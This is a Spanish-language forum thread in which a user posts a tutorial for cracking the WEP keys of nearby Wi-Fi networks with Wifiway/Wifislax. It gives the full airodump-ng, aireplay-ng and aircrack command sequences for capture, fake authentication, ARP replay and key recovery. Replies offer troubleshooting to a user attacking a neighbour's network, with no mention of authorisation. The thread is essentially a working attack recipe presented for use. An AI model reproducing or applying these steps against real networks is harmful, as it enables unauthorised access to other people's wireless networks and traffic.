Páginas: [1]
|
 |
|
Autor
|
Tema: tutorial wifieslax, wifiway en cualquiera de sus versiones (Leído 23319 veces)
|
heaviloto
|
hola, por peticion de rockeropasiempre, me e decidido a postear mi tutorial echo con apuntes cojidos de aportaciones del compañero y gran AMIGO PERSONAL zydas, esta mas bien personalizado, aunque e echo algunas variacones para que todos podais entender, creo
TUTORIAL WIFIWAY , WIFIESLAX (EN CUALQUIERA DE SUS VERSIONES)
Primero tenemos que saber la interface de nuestra tarjeta de red (en mi caso es wlan0), abrimos terminal y ponemos
_ wifiway:~# iwconfig (enter)
1º Paso ver datos (abrimos terminal)
_ wifiway:~# airodump-ng wlan0 (con esto hacemos un escaneo de redes) Paramos el escaneo Ctrl+C
2º Paso (grabar archivo datos para key)
_ seleccionamos el AP _ necesitamos ; bssid, ch, nombre (router) _ wifiway :~# airodump-ng -c ch --bssid (del AP) -w (inventar nombre archivo) wlan0 (enter)
_ ahora sale si hay alguien conectado BSSID STATION PWR LOST PACKEST PROBES ↑ ↑ (router) (alguien conectado) ↗A- SI ¿ ALGUIEN CONECTADO? ↘B- NO
(abrimos terminal)
_ A/ wifiway: ~# aireplay-ng -3 -b (bssid del AP) -h (bessid del que este conectado) wlan0 (enter) (denominado A3)
_NOTA IMPORTANTE TOMAR UNA BIRRA Y ESPERAR 15 O 20 MINUTOS
_ si no hay nadie conectado opción B
(abrimos terminal)
_B/ wifiway: ~# aireplay-ng -1 30 -o 1 -e (nombre del router) -a ( bssid del AP) -h (nuestra bssid) wlan0 (enter) ( con esto nos asociamos y hacemos de cliente) (denominado A1)
_ A continuación aplicamos opción A/
_Ataque key
(abrimos terminal)
_ wifiway: ~# aircrack-ptw (nombre inventado del archivo)-01.cap (enter) Ha partir de 30.000 datas debe salirnos KEY FOUND ( a veces hacen falta mas pero podemos atacar a partir de hay)
En caso de no funcionar aplicamos opción C/
(abrimos terminal)
_ wifiway:~# aireplay-ng -2 -p 0841 -c ff:ff:ff:ff:ff:ff -b ( bssid del AP) -h (nuestra bssid o conectada ) wlan0 (enter) (deniminado A2)
Y para key ( aquí sin –ptw)
_ wifiway:~# aircrack (nombre inventado del archivo)-01.cap (enter) Aquí necesitaremos 500.000 datas en adelante
LARGA VIDA AL ROCK&ROLL HEAVILOTO
espero que os guste, y os sirva de ayuda, al menos esa es mi intencion
un saludo
PD: post abierto, a aportaciones y observaciones que se agradeceran, y postear dudas
|
|
|
|
« Última modificación: 13 Abril 2009, 01:51 por heaviloto »
|
|
larga vida al rock&roll heaviloto
Tengo una solucion que te ofrezco amigo mio y a cambio nada me des, las luces encendidas son problema tuyo y mio lo vamos a resolver (leño)
|
|
|
|
|
|
rockeropasiempre
|
Buenas. Gracias tio, bien hecho. Ya me lo estoy copiando y poniendo en práctica.
Saludos
|
|
|
|
|
|
|
|
|
zydas
I´m guilty
|
Buen manual, el que quiera aprender que estudie o lea un poco.
Seguro que a mas de uno le soluciona sus dudas.
saludos
|
|
|
|
|
|
|
|
|
heaviloto
|
hola, gracias, KAR por tu valoracion tan positiva, rockeropasiempre por animarme a postearlo y especialmente a zydas, sin ti no seria posible, como ya sabes ( un saludo colilla)
un saludo
|
|
|
|
|
|
Tengo una solucion que te ofrezco amigo mio y a cambio nada me des, las luces encendidas son problema tuyo y mio lo vamos a resolver (leño)
|
|
|
Aleybr
|
Bien paso a comentar mis problemas... tengo una acer extensa 5200 con una broadcom 4311 Primero probe con el wifislax 3.1 y no andubo... ahora estoy con este programa... bien paso a comentar cuales son mis pasos capaz soy yo que no entiendo mucho... : bien empiezo asi: iwconfig (veo mi red "Wlan0") airodump-ng wlan0 (veo las redes y veo cual es la red que quiero acceder ) (la red de mi hermano).que esta en la casa de al lado bien ahora paso a grabar los datos airodump-ng -c 4 (el canal de mi hermano) -b (bssid) -w datos wlan0 abro una nueva ventana y pongo
Aca en este paso es cuando empieza a haber problemas
aireplay-ng -1 30 -o 1 -e (el nombre de la red) -a (la mac de la red) -h 00:11:22:33:44:55 wlan0
bien pasa lo siguiente... empieza a decirme "Sending Authentication request (open system) [Ack] Authentication successful Sending association request [ack]" y lo repite mil veces
no termina de asociar me parece.... ahora mi pregunta es... que debo hacer? por que los #Data no suben tardo practicamente una hora par recopilar 1000 si alguien pudiese ayudarme le estare muy agradecido ya que quiero aprender ...
muchisimas gracias ! Alejandro.
|
|
|
|
|
|
|
|
|
heaviloto
|
|
|
|
|
|
|
|
|
|
Aleybr
|
sigue sin explicarme nada... me estoy volviendo loco!
|
|
|
|
|
|
|
|
|
perdigo
|
prueba el
iwconfig "iface" rate 1M
donde "iface es tu tarjeta, o sea rausb0, wlan0, ath0, etc
|
|
|
|
|
|
|
|
|
Aleybr
|
ya lo hice y no cambia en sentido a la inyeccion me vuelvo locoooooooooo en google nno hay nada tampoco
|
|
|
|
|
|
|
|
|
zydas
I´m guilty
|
No te asocias porque te falta cobertura. en la asociaión te debe aparecer esto
"Sending Authentication request (open system) [Ack] Authentication successful :-) Sending association request [ack]"
Para que estés asociado correctamente te deben aparacer estos simbolos :-)
Saludos
|
|
|
|
|
|
|
|
|
|
rockeropasiempre
|
Buenas. ¿Como que sigue sin explicarte nada?. A ver, me da la sensación de que leer, lo que se dice leer, has leido muy poco del link que te ha pasado heaviloto. En ese tutorial, nos hemos dejado el tiempo y los pocos conocimientos que tenemos. Entre otras cosas se creo para que fuera entendible a todos los niveles, es mas ni siquiera se usa un lenguaje complicado, sino todo lo contrario, así que amigo ya sabes. Es mas el tema de la cobertura que dice Zydas, lo puedes ver también en las señales de power de unas pocas de imagénes que están ahi mismo.
Saludos
|
|
|
|
|
|
|
|
|
heaviloto
|
hola, no voy a estenderme mas, ya te han contesdado, correctamente, solo queda ir a tu casa y hacertelo
un saludo
|
|
|
|
|
|
|
|
|
|
Páginas: [1]
|
|
|
|